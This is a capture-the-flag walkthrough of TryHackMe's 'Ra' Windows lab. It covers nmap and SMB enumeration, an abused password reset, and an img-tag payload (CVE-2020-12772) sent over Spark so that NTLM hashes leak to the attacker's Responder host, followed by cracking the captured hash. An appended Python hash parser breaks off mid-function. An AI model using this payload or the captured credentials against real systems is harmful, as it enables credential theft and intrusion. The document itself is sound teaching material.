
TryHackMe Ra Writeup

Overview

This Windows box involves a lot of enumeration. It starts with resetting an account through the poorly implemented password-reset functionality on the web server. Then we enumerate SMB and find installation files for Spark 2.8.3, which is vulnerable to CVE-2020-12772; exploiting it gives us the NTLM hash of a user on the box. That user is a member of the Account Operators group, and we find a PowerShell script that is run automatically every few minutes, so we change the password of the user who owns that scheduled script. We modify the script to add another user to the domain and put the newly created user in the Administrators group. Now we can use psexec or Evil-WinRM to log in as the user we created, who is a member of the Administrators group.

Machine Link: https://tryhackme.com/room/ra
Operating System: Windows
Difficulty: Hard
Machine Created by: 4ndr34zz

Enumeration

Nmap Scan

# Nmap 7.80 scan initiated Sat Nov 14 20:13:25 2020 as: nmap -p- --min-rate 10000 -T4 -sC -sV -v -Pn -oN nmap-scan 10.10.226.131
Nmap scan report for 10.10.226.131
Host is up (0.16s latency).
Not shown: 65500 filtered ports
PORT      STATE SERVICE             VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http                Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2020-11-14 14:44:27Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-methods: 
|_  Supported Methods: OPTIONS
| http-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|_  Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesnt have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Issuer: commonName=Windows Admin Center
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha512WithRSAEncryption
| Not valid before: 2020-04-30T14:41:03
| Not valid after:  2020-06-30T14:41:02
| MD5:   31ef ecc2 3c93 81b1 67cf 3015 a99f 1726
|_SHA-1: ef2b ac66 5e99 dae7 1182 73a1 93e8 a0b7 c772 f49c
|_ssl-date: 2020-11-14T14:47:28+00:00; +30s from scanner time.
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
2179/tcp  open  vmrdp?
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server       Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2020-11-14T14:46:51+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-13T14:23:32
| Not valid after:  2021-05-15T14:23:32
| MD5:   6807 9b9e 1b7c 5868 04d2 2c76 0cff d0f3
|_SHA-1: 0120 f2b6 78c5 cd14 1f35 edb9 3f5d 853a 9c78 788b
|_ssl-date: 2020-11-14T14:47:29+00:00; +31s from scanner time.
5222/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
| 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
| 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     auth_mechanisms: 
| 
|     stream_id: 8m9lbpgdkf
|_    unknown: 
5223/tcp  open  ssl/hpvirtgrp?
5229/tcp  open  jaxflow?
5262/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
| 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
| 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     auth_mechanisms: 
| 
|     stream_id: 1d9uzzborg
|_    unknown: 
5263/tcp  open  ssl/unknown
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
| 
|     errors: 
|       (timeout)
|     compression_methods: 
| 
|     xmpp: 
| 
|     auth_mechanisms: 
| 
|     capabilities: 
| 
|_    unknown: 
5270/tcp  open  ssl/xmp?
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
| 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
| 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     auth_mechanisms: 
| 
|     stream_id: 936v5nk59h
|_    unknown: 
5276/tcp  open  ssl/unknown
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  http                Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp  open  ssl/http            Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9090/tcp  open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:26 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:34 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp  open  ssl/xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:47 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:47 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
9389/tcp  open  mc-nmf              .NET Message Framing
49670/tcp open  msrpc               Microsoft Windows RPC
49675/tcp open  msrpc               Microsoft Windows RPC
49700/tcp open  msrpc               Microsoft Windows RPC
49892/tcp open  msrpc               Microsoft Windows RPC
Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-11-14T14:46:53
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 14 20:23:10 2020 -- 1 IP address (1 host up) scanned in 584.63 seconds

From the nmap scan we learn the DNS domain name, windcorp.thm, and the ssl-cert script leaks the hostname fire.windcorp.thm. I add both of these to my /etc/hosts file.

Port 80

We see a Reset Password button, which asks for the username and the answer to any one of the 4 security questions.

On the main page we find a list of the staff with their usernames.

Let’s create a username list.

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428

There is a section “Employees in Focus” and looking at the picture names revealed Lily Levesque’s pet’s name. Now we can use the reset password functionality to reset her password. So the username is lilyle and pet’s name is Sparky.

Enumerating SMB

Let’s look at the SMB shares and the password policy. Checking the password policy before any brute-forcing is good practice: if an account lockout policy is set, we could end up locking out accounts, which is not what we want.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234'  --shares
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\lilyle:ChangeMe#1234 
SMB         10.10.226.131   445    FIRE             [+] Enumerated shares
SMB         10.10.226.131   445    FIRE             Share           Permissions     Remark
SMB         10.10.226.131   445    FIRE             -----           -----------     ------
SMB         10.10.226.131   445    FIRE             ADMIN$                          Remote Admin
SMB         10.10.226.131   445    FIRE             C$                              Default share
SMB         10.10.226.131   445    FIRE             IPC$            READ            Remote IPC
SMB         10.10.226.131   445    FIRE             NETLOGON        READ            Logon server share 
SMB         10.10.226.131   445    FIRE             Shared          READ            
SMB         10.10.226.131   445    FIRE             SYSVOL          READ            Logon server share 
SMB         10.10.226.131   445    FIRE             Users           READ            

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234'  --pass-pol                                                     
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\lilyle:ChangeMe#1234 
SMB         10.10.226.131   445    FIRE             [+] Dumping password info for domain: WINDCORP
SMB         10.10.226.131   445    FIRE             Minimum password length: 7
SMB         10.10.226.131   445    FIRE             Password history length: 24
SMB         10.10.226.131   445    FIRE             Maximum password age: 
SMB         10.10.226.131   445    FIRE             
SMB         10.10.226.131   445    FIRE             Password Complexity Flags: 010001
SMB         10.10.226.131   445    FIRE                 Domain Refuse Password Change: 0
SMB         10.10.226.131   445    FIRE                 Domain Password Store Cleartext: 1
SMB         10.10.226.131   445    FIRE                 Domain Password Lockout Admins: 0
SMB         10.10.226.131   445    FIRE                 Domain Password No Clear Change: 0
SMB         10.10.226.131   445    FIRE                 Domain Password No Anon Change: 0
SMB         10.10.226.131   445    FIRE                 Domain Password Complex: 1
SMB         10.10.226.131   445    FIRE             
SMB         10.10.226.131   445    FIRE             Minimum password age: 
SMB         10.10.226.131   445    FIRE             Reset Account Lockout Counter: 2 minutes 
SMB         10.10.226.131   445    FIRE             Locked Account Duration: 2 minutes 
SMB         10.10.226.131   445    FIRE             Account Lockout Threshold: 5
SMB         10.10.226.131   445    FIRE             Forced Log off Time: Not Set

According to the password policy there is a lockout threshold of 5, which means that if we provide the wrong password 5 times for a user, that account is locked out for the Locked Account Duration, 2 minutes in this case. So let’s avoid brute-forcing SMB and continue exploring the SMB shares accessible to lilyle.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbmap -u 'lilyle' -p 'ChangeMe#1234'  -H windcorp.thm  -r                                                                 130 ⨯
[+] IP: windcorp.thm:445        Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    InitShutdown
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    lsass
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    ntsvcs
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    scerpc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-244-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    epmapper
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-2b8-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    LSM_API_service
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    eventlog
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-530-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    atsvc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-734-0
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    wkssvc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-340-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-340-1
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    RpcProxy\49674
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    1fa260e57b61ac4e
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    RpcProxy\593
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    srvsvc
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    spoolss
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-964-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    netdfs
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    ROUTER
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    W32TIME_ALT
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-32c-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PSHost.132498373871065180.4064.DefaultAppDomain.powershell
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-cd0-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    TermSrv_API_service
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    Ctx_WinStation_API_service
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    SessEnvPublicRpc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-16fc-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PSHost.132498373859437939.3600.DefaultAppDomain.sme
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PSHost.132498374391876309.3004.DefaultAppDomain.powershell
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-cb0-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    iisipmff316478-5d8e-4104-a522-2909c9a54989
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    iislogpipeadb9a285-0017-403b-b5a4-8dbfb24435c9
        NETLOGON                                                READ ONLY       Logon server share 
        .\NETLOGON\*
        dr--r--r--                0 Sat May  2 15:32:19 2020    .
        dr--r--r--                0 Sat May  2 15:32:19 2020    ..
        Shared                                                  READ ONLY
        .\Shared\*
        dr--r--r--                0 Sat May 30 06:15:42 2020    .
        dr--r--r--                0 Sat May 30 06:15:42 2020    ..
        fr--r--r--               45 Fri May  1 21:02:36 2020    Flag 1.txt
        fr--r--r--         29526628 Sat May 30 06:15:01 2020    spark_2_8_3.deb
        fr--r--r--         99555201 Sun May  3 16:38:39 2020    spark_2_8_3.dmg
        fr--r--r--         78765568 Sun May  3 16:38:39 2020    spark_2_8_3.exe
        fr--r--r--        123216290 Sun May  3 16:38:39 2020    spark_2_8_3.tar.gz
        SYSVOL                                                  READ ONLY       Logon server share 
        .\SYSVOL\*
        dr--r--r--                0 Sat May  2 15:32:20 2020    .
        dr--r--r--                0 Sat May  2 15:32:20 2020    ..
        dr--r--r--                0 Sat May  2 15:32:20 2020    NRznLVEcPj
        dr--r--r--                0 Thu Apr 30 20:41:10 2020    windcorp.thm
        Users                                                   READ ONLY
        .\Users\*
        dw--w--w--                0 Sun May  3 03:35:58 2020    .
        dw--w--w--                0 Sun May  3 03:35:58 2020    ..
        dr--r--r--                0 Sun May 10 16:48:11 2020    Administrator
        dr--r--r--                0 Fri May  1 06:03:55 2020    All Users
        dr--r--r--                0 Fri May  1 18:39:44 2020    angrybird
        dr--r--r--                0 Fri May  1 18:39:34 2020    berg
        dr--r--r--                0 Fri May  1 18:39:22 2020    bluefrog579
        dr--r--r--                0 Sun May  3 19:00:02 2020    brittanycr
        dr--r--r--                0 Fri May  1 18:39:08 2020    brownostrich284
        dr--r--r--                0 Sat Nov 14 19:55:12 2020    buse
        dw--w--w--                0 Fri May  1 05:05:11 2020    Default
        dr--r--r--                0 Fri May  1 06:03:55 2020    Default User
        fr--r--r--              174 Fri May  1 06:01:55 2020    desktop.ini
        dr--r--r--                0 Fri May  1 18:38:54 2020    edward
        dr--r--r--                0 Sun May  3 05:00:16 2020    freddy
        dr--r--r--                0 Fri May  1 18:38:28 2020    garys
        dr--r--r--                0 Sat Nov 14 22:21:05 2020    goldencat416
        dr--r--r--                0 Fri May  1 18:38:17 2020    goldenwol
        dr--r--r--                0 Fri May  1 18:38:06 2020    happ
        dr--r--r--                0 Fri May  1 18:37:53 2020    happyme
        dr--r--r--                0 Fri May  1 18:37:42 2020    Luis
        dr--r--r--                0 Fri May  1 18:37:31 2020    orga
        dr--r--r--                0 Fri May  1 18:37:19 2020    organicf
        dr--r--r--                0 Sat Nov 14 22:21:59 2020    organicfish718
        dr--r--r--                0 Fri May  1 18:37:06 2020    pete
        dw--w--w--                0 Thu Apr 30 20:05:47 2020    Public
        dr--r--r--                0 Fri May  1 18:36:54 2020    purplecat
        dr--r--r--                0 Fri May  1 18:36:42 2020    purplepanda
        dr--r--r--                0 Fri May  1 18:36:31 2020    sadswan
        dr--r--r--                0 Sat Nov 14 22:17:23 2020    sadswan869
        dr--r--r--                0 Fri May  1 18:36:20 2020    sheela
        dr--r--r--                0 Fri May  1 18:35:39 2020    silver
        dr--r--r--                0 Fri May  1 18:35:24 2020    smallf
        dr--r--r--                0 Fri May  1 18:35:05 2020    spiff
        dr--r--r--                0 Fri May  1 18:34:49 2020    tinygoos
        dr--r--r--                0 Fri May  1 18:33:57 2020    whiteleopard

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbclient -U lilyle  //windcorp.thm/Shared                                                                                   1 ⨯
Enter WORKGROUP\lilyle's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 30 06:15:42 2020
  ..                                  D        0  Sat May 30 06:15:42 2020
  Flag 1.txt                          A       45  Fri May  1 21:02:36 2020
  spark_2_8_3.deb                     A 29526628  Sat May 30 06:15:01 2020
  spark_2_8_3.dmg                     A 99555201  Sun May  3 16:36:58 2020
  spark_2_8_3.exe                     A 78765568  Sun May  3 16:35:56 2020
  spark_2_8_3.tar.gz                  A 123216290  Sun May  3 16:37:24 2020

                15587583 blocks of size 4096. 10895808 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ cat 'Flag 1.txt'                                                      
THM{466d52dc75******************************}

There are also installation files for Spark 2.8.3, and a quick Google search shows that Spark 2.8.3 is vulnerable. I grab the .deb file from the SMB share.

On reading about CVE-2020-12772, I found this GitHub repository, which was actually created by the makers of this machine. According to it, we can send a message containing an img tag to another user over Spark; each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image together with the NTLM hashes of the user who visits the link, i.e. the user we are chatting with.
As explained in the GitHub repo, we will use Responder and send a message with an img tag, and we should receive the NTLM hash of the user who visits the link.

Since we have a username list, we can send our payload “<img src=http://yourtun0IP/a.png>” to the different users and check in Responder whether we get an NTLM hash for any of them.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ sudo responder -I tun0
[sudo] password for sid: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.2.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.82.29]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']



[+] Listening for events...
[HTTP] NTLMv2 Client   : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000
00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C
004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000
33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000
00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000
0000000000000000000000000000090000000000000000000000
[*] Skipping previously captured hash for WINDCORP\buse

Let’s crack this hash with the help of John the Ripper.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ echo "buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD00000000020006005300
4D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C00030028007300650072007600650072003200300
0300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE
5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000" > hash
                                                                                                                                     
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131      (buse)
1g 0:00:00:02 DONE (2020-11-14 23:27) 0.3355g/s 993073p/s 993073c/s 993073C/s v0yage..uya051
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
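
The capture and the crack above, as an added example that is not part of the original writeup: a parser for the NetNTLMv2 line Responder printed (the page's own captured line is embedded inline), which decodes the MS-NLMP target-info blob so you can see what the victim's client recorded about the server it really authenticated to, plus a single-candidate NTProofStr check that recomputes exactly what john recomputes per guess. The MD4 routine is included because hashlib's md4 is disabled on many current builds; the names SMB, SMB-TOOLKIT, smb.local and server2003.smb.local are Responder's hard-coded CHALLENGE defaults, which makes them a usable indicator when triaging a captured exchange or a packet capture.

```python
import hashlib
import hmac
import struct
from datetime import datetime, timedelta, timezone

MASK = 0xFFFFFFFF

# The NetNTLMv2 line Responder printed on this box, copied from the writeup above.
CAPTURED = (
    "buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:"
    "01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD00000000020006005300"
    "4D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C00030028007300650072007600650072003200300"
    "0300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE"
    "5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000"
)

# Target-info names Responder hard-codes into the NTLM CHALLENGE it sends back to victims.
RESPONDER_DEFAULT_NAMES = {"SMB", "SMB-TOOLKIT", "smb.local", "server2003.smb.local"}

AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
          5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
          10: "ChannelBindings"}
NAME_AV_IDS = (1, 2, 3, 4, 5, 9)          # AV pairs whose value is a UTF-16LE string
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib's md4 is disabled on many current builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, n: ((v << n) | (v >> (32 - n))) & MASK
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    # Pad to 56 mod 64 bytes, then append the bit length as a little-endian 64-bit integer.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
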